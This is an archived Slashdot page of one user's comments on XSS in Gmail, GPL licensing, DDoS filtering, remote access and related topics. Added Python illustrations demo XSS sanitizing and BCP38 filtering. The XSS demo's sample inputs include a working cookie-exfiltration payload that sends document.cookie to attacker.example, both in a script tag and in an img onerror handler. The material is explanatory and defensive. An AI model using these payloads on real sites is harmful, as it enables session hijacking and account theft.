Slashdot Mirror


User: bedessen

bedessen's activity in the archive.

Stories: 0
Comments: 438

Comments · 438

  1. Re:Need more than just the username on Gmail Accounts Vulnerable to XSS Exploit · · Score: 1

    "Score: 5, Informative"? Hardly. You are misinterpreting. This has nothing to do with phishing. If this is anything like the majority of XSS attacks all you need to do is get the victim to READ your email. Not click on anything, not enter any info, just view the email.

    The key here is that google must sanitize all emails so that any embedded javascript is not executed. If you can craft an email that gets by google's filtering, then the javascript will be run in the context of the google.com domain, which means it has access to the google.com cookies. That's what the "cross" in Cross Site Scripting means -- getting your script code run under the pretext of some other site's URL. The cookie security model means that if the browser is running javascript from a page from google.com then it has access to google's cookies. But javascript running in a page on attacker.com does not have access to google.com's cookies, only those for attacker.com.

    From there it's a simple matter to submit the data (create a form with a couple of fields and call its submit() function) to a server under the attacker's control. From there they have the login name and cookie data for the victim, and can now log on as them.

    The same sort of attack is the motivation behind a lot of other XSS attacks. For example, say there was a forum script (*cough* phpBB *cough*) that did not sanitize input sufficiently. Normally, if you type javascript into a post it should be quoted or escaped so that it's not executed. However, if you fool this quoting code, then your javascript will run when the page is viewed. So you make a post that contains this javascript code, then whoever views your post will cause the JS to execute, and since it's a page under the forum's domain it has access to the forum's cookies. So you somehow transmit that data back to the attacker, and now he can log on as anyone that read the malicious post. No user intervention necessary.
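
As an added illustration of the point made in the comment above (this is example code, not anything from the comment, from Google or from phpBB), the following Python contrasts the two sanitizing strategies the comment alludes to: a blocklist filter that strips only `<script>` tags, which a crafted body can get past, and escape-by-default output encoding, which cannot be fooled into opening a tag. The sample email bodies and the host attacker.example are constructed for the example, and the regex check at the end is only a rough stand-in for a browser actually executing the markup.

```python
import html
import re

# The kind of blocklist filter that gets bypassed: it knows about <script>
# and nothing else.
_SCRIPT_TAG = re.compile(r"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)

# Rough stand-in for "would a browser execute this": a literal <script>
# element, or any element carrying an on* event-handler attribute.
_EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def naive_strip_scripts(untrusted: str) -> str:
    """Blocklist approach: remove <script>...</script> and pass the rest through."""
    return _SCRIPT_TAG.sub("", untrusted)


def escape_for_html(untrusted: str) -> str:
    """Escape-by-default: &, <, >, " and ' become entities, so the text can
    never open a tag or an attribute, whatever it contains."""
    return html.escape(untrusted, quote=True)


def render_email_body(untrusted: str, sanitizer) -> str:
    """Model of a webmail page dropping an untrusted body into its own origin."""
    return '<div class="body">' + sanitizer(untrusted) + "</div>"


def contains_active_markup(rendered: str) -> bool:
    """True if the rendered page still carries something a browser would run."""
    return bool(_SCRIPT_TAG.search(rendered) or _EVENT_HANDLER.search(rendered))


# Constructed sample bodies (attacker.example is a reserved documentation name).
# The payload is the textbook cookie-to-attacker redirect the comment describes.
EXFIL = "document.location='http://attacker.example/?'+document.cookie"
SAMPLES = [
    "Hello <b>there</b>, see you at 5",          # harmless formatting
    "<script>" + EXFIL + "</script>",            # what the blocklist catches
    '<img src="x" onerror="' + EXFIL + '">',     # what the blocklist misses
]


def audit(sanitizer) -> list:
    """For each sample, does the rendered page still carry executable markup?"""
    return [contains_active_markup(render_email_body(s, sanitizer)) for s in SAMPLES]


if __name__ == "__main__":
    print("blocklist:", audit(naive_strip_scripts))   # [False, False, True]
    print("escaping: ", audit(escape_for_html))       # [False, False, False]
```

The escaped output loses the ability to render the sender's `<b>` as bold, which is exactly the trade: a webmail that wants rich HTML has to parse the body into a tree and re-emit only an allowlist of elements and attributes, not strip known-bad strings. A second, independent layer (not discussed in the comment) is marking the session cookie HttpOnly so that script cannot read `document.cookie` even if it does run.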

  2. Re:Is it an open protocol? on Replacing TCP? · · Score: 1

    From <http://cygwin.com/licensing.html>:

    By default, all executables link against this library (and in the process include GPL'd Cygwin glue code). This means that unless you modify the tools so that compiled executables do not make use of the Cygwin library, your compiled programs will also have to be free software distributed under the GPL with source code available to all.


    So, if you compile a Cygwin binary (that requires the Cygwin DLL), your program must be GPL because Cygwin is GPL.

    Alternatively, Redhat offers two alternatives, both documented on that page: Any OSI-certified license is acceptable, so your code could be BSD and still link to the GPL library. Or, you can purchase a buy-out license.

    However, the website in this case was distributing Cygwin-compiled binaries without source, which unless they bought the Redhat buyout thing violates the Cygwin license.

    I suspect their response would be just to remove the Cygwin binaries. However they still have an obligation to provide source to anyone they gave the binaries to. "The cat's out of the bag" so to speak once you distribute the first binary copy to one person.

  3. Re:If not BIND then what? on PostNuke Open Source CMS Attacked · · Score: 1

    I agree that BIND is used widely but it has an atrocious security record. Software that has a terrible record of horrible security flaws doesn't just become secure because past bugs are fixed in the current version. Compare the security record of djbdns with BIND for a good example of secure-by-design versus "spaghetti code from decades ago when security didn't matter".

  4. That's not irony on PostNuke Open Source CMS Attacked · · Score: 1

    Sorry but that's not ironic. You would expect that if any unknown backdoors existed in a closed-source application that they would be found when the source was opened -- that's just common sense. Irony is hard to describe but typically applies when something unexpected happens.

  5. Re:I'm not a very good network admin on DDoS Extortion Attempts On the Rise · · Score: 1

    There's nothing you as an individual company / organization can really do, for all the reasons you've listed.

    However, if there was a concerted effort among ISPs to implement proper filtering of packets, then at least DDoS attacks that used spoofed sources would be impacted. This can't solve all types of attacks, and it requires significant cooperation and motivation because currently there is little incentive to do so. Basically you configure your border routers not to pass packets that you know are invalid -- those with RFC1918 addresses, bogon addresses, and addresses outside of your AS. This is all documented in BCP38.

    So basically, tell your boss that to prevent attacks like this you can have him mandate that whatever company you decide to buy connectivity from must implement BCP38. If ISPs have an actual incentive to do this, instead of just a bunch of grey-bearded admins saying it would be a good idea, then perhaps it would be implemented more widely. Essentially, tell him to make his purchasing decisions based on "good network stewardship" and not just lowest price. If more companies did this then as a whole the DDoS landscape would clean up just a little bit.

    There was recently a long thread on nanog about this. It's good reading as it shows from the operator side of the fence how the situation is known to be improvable but there's no financial (and thus managerial) reason to do it.
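
An added example, not from the comment above and not from BCP38 itself: a Python model of the source-address checks the comment lists (RFC 1918 space, bogons, and addresses outside your own AS), applied in both directions at a border. It goes slightly beyond the comment in also dropping inbound packets that claim one of your own addresses as their source, which is the same spoofing seen from the other side of the link. The prefixes 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges used here as constructed sample data, and the bogon list is a short subset for illustration; real bogon lists are longer and change over time.

```python
import ipaddress

# RFC 1918 private space: never a valid source on a border link.
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# A short sample of reserved/unallocated ("bogon") space. Real bogon lists
# are longer and change over time; this subset is for illustration only.
BOGONS = [ipaddress.ip_network(n) for n in
          ("0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
           "224.0.0.0/4", "240.0.0.0/4")]


def _in_any(addr, networks):
    return any(addr in net for net in networks)


def classify_source(src, direction, own_prefixes):
    """Return 'accept' or 'drop:<reason>' for one packet's source address.

    direction is 'out' (leaving our AS toward the upstream) or 'in'
    (arriving from the upstream). own_prefixes are the networks we
    legitimately originate, as ipaddress network objects.
    """
    addr = ipaddress.ip_address(src)
    if _in_any(addr, RFC1918):
        return "drop:rfc1918-source"
    if _in_any(addr, BOGONS):
        return "drop:bogon-source"
    ours = _in_any(addr, own_prefixes)
    if direction == "out" and not ours:
        # Leaving us with a source we do not own: spoofed, or a leak.
        return "drop:source-not-ours"
    if direction == "in" and ours:
        # Arriving from outside but claiming to be us: spoofed.
        return "drop:our-source-from-outside"
    return "accept"


def apply_filter(packets, own_prefixes):
    """Classify (direction, src, dst) tuples; return a list of (src, verdict)."""
    nets = [ipaddress.ip_network(p) for p in own_prefixes]
    return [(src, classify_source(src, direction, nets))
            for direction, src, dst in packets]


# Constructed sample: an AS that owns 203.0.113.0/24, talking to 198.51.100.0/24.
OWN_PREFIXES = ["203.0.113.0/24"]
SAMPLE_PACKETS = [
    ("out", "203.0.113.10", "198.51.100.5"),    # legitimate outbound
    ("out", "10.1.2.3", "198.51.100.5"),        # RFC 1918 leak or spoof
    ("out", "198.51.100.77", "198.51.100.5"),   # spoofed: not our prefix
    ("in", "198.51.100.5", "203.0.113.10"),     # legitimate inbound
    ("in", "203.0.113.200", "203.0.113.10"),    # spoofed: claims to be us
    ("in", "127.0.0.1", "203.0.113.10"),        # bogon
]

if __name__ == "__main__":
    for src, verdict in apply_filter(SAMPLE_PACKETS, OWN_PREFIXES):
        print(f"{src:16} {verdict}")
```

On a real border the same logic is an interface ACL or, on a router that can do it, unicast reverse-path forwarding checks, and it only helps against attacks that spoof their source; a botnet sending from its own real addresses passes every test here, which is the limitation the comment already notes.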

  6. Re:Not all attacks can be blocked. on DDoS Extortion Attempts On the Rise · · Score: 1

    No, they do not. They block requests based on the HTTP Referer field. That is very different from null-routing, which is obviously a distinction you don't understand. One is about blocking packets in your ISP's upstream, before they even arrive at your system. This is the only way to deal with a true denial of service attack (not a slashdotting). Anything that blocks at the application/webserver level is only effective against resource-depletion attacks, or slashdottings. When you're being (D)DoS-ed you get so many packets that they overwhelm your connection completely, making it futile to even bother looking at the packets because there would be no way to let the legitimate ones through even if you wanted to. In other words, a stream of 200MBit/s flowing to a 10MBit/s link renders it totally useless, you might as well just shut it off.

  7. Re:Is it an open protocol? on Replacing TCP? · · Score: 1

    They're also in violation of the GPL by distributing binaries linked against the Cygwin DLL without providing source. Cygwin is GPL'd, and linking against it requires your project to be GPL'd, unless they bought the pricey GPL buy-out license from redhat. Thus, they cannot provide Cygwin binaries without source, even if they're not distributing cygwin1.dll itself.

  8. Is this really the right way to go? on Joe Barr Gives ZoneMinder A Thumbs-Up · · Score: 1

    So, I commend the author for wanting to help his friend, but is this really the best way of going about it?

    First of all, as other posters have mentioned it seems unlikely that a regular 640x480 camera is going to have sufficient resolution to be able to read a license plate. In order to cover all possible positions that a car might park in, you have to keep a pretty wide angle, which means you lose the ability to zoom in on details. Judging from the screen shots it just didn't seem very realistic that you'd be able to get useful license plate info. I wonder if he even lives in a state that has both front and rear-facing plates. Not all states do, it seems to be the minority.

    On top of that, most burglaries happen in the darkness I would think, and he didn't mention anything about infrared lighting. Plus, I would imagine most half-decent burglars would conceal their identity to some degree, like wearing a hat or a mask of some kind. Plus, he only covered the front door -- surely there are other windows and doors that the crook might use.

    I think the article would have been a lot better if he'd actually tested these theories in some nontrivial way. For example, drive up in a car at night, and pretend to force the (unlocked) door open, wearing a baseball hat or ski mask. Then sit down and look at the images. Zoom in on them, enhance them, whatever. See if you can read the plates, and see if you can discern any physical details other than "young male, medium build" such as facial features. The whole theory here is that by doing this he would have useful evidence to turn over to the police should it ever happen again, so it would seem that such a simple test would have been useful.

    That aside -- what was this article supposed to be? A software review? A how-to for this specific software? The bulk of it was spent going over mundane installation details of Apache and PHP. Surely there are better places to look (like the documentation and forums that he lauded) if you're actually trying to install this thing. There was too little review of its functionality for it to be a useful "review" piece, and too little technical detail for it to be a comprehensive document of how to install the thing. I just didn't think it was very well thought-out. A review-type piece where he summarized his experience would have been a lot easier to read and more enjoyable. I mean, I don't really care what config switches he needed to use, that's all covered in the product's manual if I'm actually going to install it myself.

  9. Re:What this seems to be on Can Power Point Prejudice Juries? · · Score: 2, Insightful

    It differs because it's synthetic. It's created by the attorney to be as persuasive as possible. Contrast a police photo of the crime scene with the attorney pointing to various locations and verbally explaining his version of the incident to a 3-D CGI rendered "flyby" of the scene with all sorts of re-enactment style "he was standing here", "he meant to shoot here", "it might have looked like this" annotations. With a high enough budget those things can tend to look like Hollywood movie versions of reality. In other words, you can twist reality by artificially implying that because some fancy 3-D rendition of a scene went some way, then it must have gone that way in reality. The jury and judge should be exposed to neutral evidence, such as what is collected by the police investigators, and not have the full computer graphics arsenal of tools that can put many different spins on reality. If you want to demonstrate how the bullet pierced the man's artery, for example, then find a medical textbook that shows the artery, blow it up, and have the medical expert witness point to it as he testifies. If you allow attorneys the ability to generate extravagant computer-generated recreations then they will find all sorts of ways of being as persuasive as possible - and thus prejudice the jury.

    Note that I don't think a plain PowerPoint presentation consisting of only text necessarily has this capability, I'm more referring to the third point above of calling anything graphical and flashy "PowerPoint."

  10. Re:pretty safe offer on What's The Linux Kernel Worth? · · Score: 1

    There's nothing that says the kernel is an all-or-nothing venture. If they convinced owners of 90% of the core code to re-license then they could just nuke the rest of the code from the tree and either a) disable support for those devices/options or b) wait for or pay for someone to rewrite those parts.

    That said I don't think any of the key core developers is going to go anywhere near this any time soon, so your overall point is valid. However, there is no requirement to find and convince _every_ copyright holder. Just delete the code that you can't license. If it's required for your purposes then rewrite it, otherwise just drop support for that. Any kernel developer that refused the offer would only be holding up their individual code contributions from inclusion in the bsd tree, not the rest of the kernel. Naturally, people with significant code would be in that list however, so again I'm not saying this is realistic.

  11. Re:No price is high enough on What's The Linux Kernel Worth? · · Score: 1

    If that were a desire of microsoft then why haven't they tried to "embrace and extend" FreeBSD? I see no closed source "Microsoft FreeBSD" on the market. Same with all the other *BSDs. I think you're just trying to find things to blame them for here when the fact is that there are plenty of robust BSD-licensed operating systems that Microsoft has no desire to touch. I see no reason why they'd start with linux.

  12. Re:Merkey's offer doesn't make sense to me ... on What's The Linux Kernel Worth? · · Score: 1

    Because it makes it possible to create all sorts of derivative works or products based on linux while giving the big middle finger to the community.

    Want to create a wireless router/gateway with rich functionality but can't/won't publish the driver source? Sure, just take this wacko BSD copy of the linux kernel and write your proprietary hardware driver, then ship the product. No need to interact with the community, no need to provide the source to that driver. Most importantly, there's no need to pussyfoot around that userspace/kernelspace boundary and associated headaches, as you currently have to do if you want to build a proprietary product around linux.

    Got some hardware thing that needs TCP/IP filtering/firewall capability? Just lift iptables code. You don't have to bother trying to do it "the right way", you just copy and paste the code, without guilt. No need to donate your spiffy new features and extensions back to the community -- screw them, this is business. As has been pointed out elsewhere in the comments, use of the GPLd iptables code in commercial products happens VERY often and has led to a number of settlements based on GPL complaints. All of that hassle goes away if it's BSD-licensed.

    In fact I'm sure there are tons of embedded companies that would love to get their paws on linux in a truly "unencumbered" form. You have complete control to add functionality to either kernel or user-space, without having to go through all the pains of binary-only drivers. No need to fuss with satisfying users who want the source, no need to worry about violating your NDAs on hardware specs. Just a 100% pure tested, proven, scalable platform that is yours to use for any purpose whatsoever without restriction. Hell I'm sure $50k is chump change to most companies to never have to worry about licensing issues for a product.

  13. Re:Benefits of alternative languages on An Alternative to SQL? · · Score: 1

    Oh come on, did you even look at the documentation? Your example isn't even close to correct syntax. It's not as bad as you're trying to make it out to be.

    inserts:
    INSERT r TUPLE {x 1, y 3};
    r += TUPLE {x 1, y 3};

    deletes:
    DELETE r WHERE x = 2;
    r -= WHERE x = 2;
    r -= [ x = 2 ];

    updates:
    UPDATE r WHERE x = 2 SET ( y := 3, z := 4);
    r @= WHERE x = 2 SET ( y := 3, z := 4 );
    r @= [ x = 2 ] SET ( y := 3, z := 4 );
    r @= [ x = 2 ] ( y := 3, z := 4 );

    http://dbappbuilder.sourceforge.net/Rel.html

  14. Re:Look, it's simple... on RIAA, MPAA Ask High Court To Review P2P Decision · · Score: 1

    Thank You. Mod parent up. I'm so very tired of seeing "fair use" equated with "right to copy entire albums/CDs in entirety for noncommercial purposes." Fair use means you can, for example, sample a 30 second excerpt of a song for the purposes of critique. It does not mean you can copy the whole album because your friend said it was good and you weren't planning on buying it anyway.

  15. Re:Another dupe, timothy? on Colorado Researchers Crack Internet Chess Club · · Score: 1

    dupewatch.com is currently available. Someone for the love of god please set this up. The "editors" (not that they actually edit) have proven time and time again that they don't give a crap about dupes, so I think social ridicule is in order.

  16. Re:FAQ #5 -- Google's DRM for your web browser on Google Launches Google Print · · Score: 1

    Oh please. It's just an image. Just look at a packet capture (or any other method) to see its URL. For your example, it was:

    http://print.google.com/print?id=ULQSG0Zs7vcC&pg=3&img=1&q=mastering+digital+photography&sig=gv2nFptEf0dj7Gzb8eZ4U8UdtUo

    As you can see from the query parameters the highlighting is done server-side and is pretty trivial to remove:

    http://print.google.com/print?id=ULQSG0Zs7vcC&pg=3&img=1&sig=gv2nFptEf0dj7Gzb8eZ4U8UdtUo

    I suppose technically you could consider that DRM but it's certainly only meant to stop the casual user. If someone wanted to print the pages they can and will, and subject to rate-limiting I'm sure you could script it if you wanted to snarf many pages.

  17. Re:huh? on Verisign Implementing SiteFinder On .cc · · Score: 1

    http://www.isc.org/index.pl?/sw/bind/delegation-only.php

    Basically you can define certain zones to be delegation-only, or you can tell it that they should all be treated that way, except for the specified list.

  18. Re:Right of First Sale in 2001 on Blizzard Stomps Bnetd in DMCA Case · · Score: 1

    Right of first sale applies to physical property that you own. That includes the CD, manual, box, etc. You do not own the software itself, you are granted a license to use it. You're free to sell the physical property all you want but that does not mean you also own the intellectual property.

    When you buy a book, it does not mean you own the right to the text - you can't go print off more copies and sell them, or make derivative works based on the characters or plot.

    When you buy sheet music, you own the physical printed copy, not the rights to the song itself.

    When you buy software you own the physical CD and packaging, not the actual program itself, which is licensed. It sucks, but that's the way it is. Trying to apply the right of first sale to something that you don't own is going about it the wrong way.

  19. Re:Why TightVNC? Other questions. on How Are You Protecting Your Computers? · · Score: 1

    > Why did you choose TightVNC? Why not RealVNC, UltraVNC, or TridiaVNC?

    Because it's the best of the lot. Try them and you'll see. TightVNC has the most advanced compression options. It has the best configuration-panel. For example, you can specify the remote address directly as either a port or as a "display number". The other ones make you enter a display number, which is clunky if you only know the port ("display = port + 32500" or something arbitrary like that.) Just little things like that.

    >Is it better to pay for VNC software, like Tridia VNC Pro or Radmin?

    I wouldn't know but I suspect not.

    > Which software has video resolution scaling of the remote desktop?

    That's one thing that VNC doesn't / can't do well. They are working on a new VNC protocol that should address this, though. I believe they're looking for donations to support the development. The tightvnc page has details.

    >What security is best? Is it good to use a VPN for secure access, or is SSH better?

    VPN is a vague term. In some contexts you can use SSH to create a VPN. For example, let's say I want to pop my mail from my mail server. But POP3 shows passwords in plaintext so I don't want to do it over the wire. Plus it's just for me so I don't want a POP3 server listening on a public interface if I don't have to. So I set up an ssh tunnel, and forward ports 25 and 110 across it. Now I just enter "localhost" for POP3 and SMTP servers in my email program and voila! I use the "autossh" utility (run as a Windows service) to maintain the tunnel, using RSA public key authentication for secure passwordless login. I don't even have to think about it or touch it, the service starts up at boot and seamlessly sets up the tunnel, and restarts it if it goes down.

    You can do something similar for lots of protocols.

    >What Windows SSH server do you use?

    OpenSSH for both client and server - good enough for OpenBSD, good enough for me. The Cygwin port has full functionality.

  20. Re:Not much on How Are You Protecting Your Computers? · · Score: 1

    I am in the same boat as the parent and great-grandparent.

    If you keep a close watch on your system it would be obvious when a new process shows up on the list*. I keep task manager running at all times and like to monitor memory usage, total processes, CPU usage, etc. Other good tools are Process Explorer and TCPView (sysinternals.com). I use Privoxy and so all web activity is shown in the console, as well as the tray icon animation.

    But besides that I hit up the trend micro virus scan every 3 to 6 months just for shits and grins, never once had anything. Never once, I should add, in more than 10 years of being connected to the internet, and BBSes before that.

    If you skip MS Lookout and IE, and know what the hell you're doing, it becomes pretty darn hard for malware and viruses to get on your system - without running all that godawful "firewall bloatware" that Symantec / McAfee and friends have turned into.

    [*] 50 Quatloos to the person who mentions the fact that a sufficiently sophisticated piece of malware could install a kernel-level driver that would hide its presence from such tools. However, it would have to be very advanced to evade all the various 3rd party tools at hand, like Process Explorer. Besides, to do anything useful it would consume network resources, which I would also notice. And such an exploit would most definitely make a splash on the security mailing lists, which I follow, so I would be aware of it.

  21. Re:try a hosted solution on Dynamic DNS - The Good, The Bad and The Cheap? · · Score: 1

    Get a VDS (virtual dedicated server.)

    You get root on your own "box" which is really just a partition of a larger server. You can install and maintain any version of whatever software you want. It's much cheaper than renting a whole dedicated server, but you get all the benefits. You can do whatever you want on your server because it's all virtualized, so the only restrictions in place are the amount of HD space, amount of bandwidth, and amount of RAM. Thrash it as hard as you want within those boundaries, no one will care.

    For $25 a month the arshost.com bronze package satisfies everything you mentioned: 3GB partition, 50GB per month transfer, and 64MB of ram. 64MB seems like not much but linux is surprisingly efficient and without an X11 desktop environment you can do a lot with a little. It's certainly more than enough for a full PHP/Python/Perl/MySQL/Apache development environment.

    Disclaimer: I am a satisfied customer of theirs, but otherwise have no vested interest.

    Oh and by the way there is no such thing as "unlimited traffic." You either get a bandwidth cap (e.g. 50GB per month) or you get an "unmetered line" which is rate-limited instead (e.g. 1Mbit.) In both cases it's just different ways of stating how much you can use. Anything advertising "unlimited traffic" is very likely to be either a scam or a heavily oversold shared server, or both.

  22. Slashdot effect for real? on NASA Releases World Viewer · · Score: 1

    So I happened upon this story a bit late... I go to load the page and get the following:

    learn.arc.nasa.gov is down for emergency maintenance. A hardware failure occurred on Thursday (9-30-2004) due to increased server load. We are building a new server and expect to be online by Tuesday (10-05-2004). Web pages and forums will be unavailable until then.
    -Randy Kim, NASA Learning Technologies

    For World Wind information and software, please visit opensource.arc.nasa.gov.
    We are working on a new World Wind patch to fix current issues and improve performance.
    Please check back with us soon.


    Could it be that slashdot actually caused damage to their server? I always thought you guys were joking about that one...

  23. Re:Welcome to Windows upgrades on XP SP2 Can Slow Down Business Apps · · Score: 1

    Yes. Microsoft did do a number of significant kernel-level improvements in XP. It's not "just a bunch of eye candy" on top of 2k as the party line would go. Here is a link to the paper Windows XP: Kernel Improvements Create a More Robust, Powerful, and Scalable OS by Russinovich and Solomon. Some of the improvements include: Larger Mapped Files, More Efficient Trimming of the Working Set, Reduced Lock Contention, Push Locks, Fast System Calls, Faster Hibernate and Resume, and Prefetching. Next time someone tells you that "2k is the best, XP is just a bunch of eye candy added on top" tell them to read that article and stop the spread of misinformation.

  24. Re:bring on the cease and desist's on University Tests Legal File Downloading System · · Score: 1

    Wow, are you really that dense that you don't see how this could be done in a way that it's legal? Follow me here...

    1. Company makes deal with many labels. "In exchange for us giving you X per month you give us the right to offer your content for unlimited download to our members"

    2. Company makes deal with university so that all students are enrolled in this program in return for some flat fee being added to everyone's student fees. Company balances its books such that money taken in here is equal to or greater than money paid out in #1.

    3. Student uses service and downloads anything offered on service. Because all offerings have had their license negotiated, student is 100% legal.

    The important thing to realize here is that this deal does not mean you can go leech anything from any site anywhere. Just like any other service you are restricted to whatever is offered. Anything you download is by definition legitimately licensed. This obviously does not cover things outside of the service, but nobody said it did.

  25. Re:A Major Problem on Get Rid of Internet Explorer - Browse Happy! · · Score: 1

    Sheesh... using a slashdot post to further one of those link-referral schemes... You should be ashamed of yourself. What's next, someone appending Google text ads to all of their posts for a commission?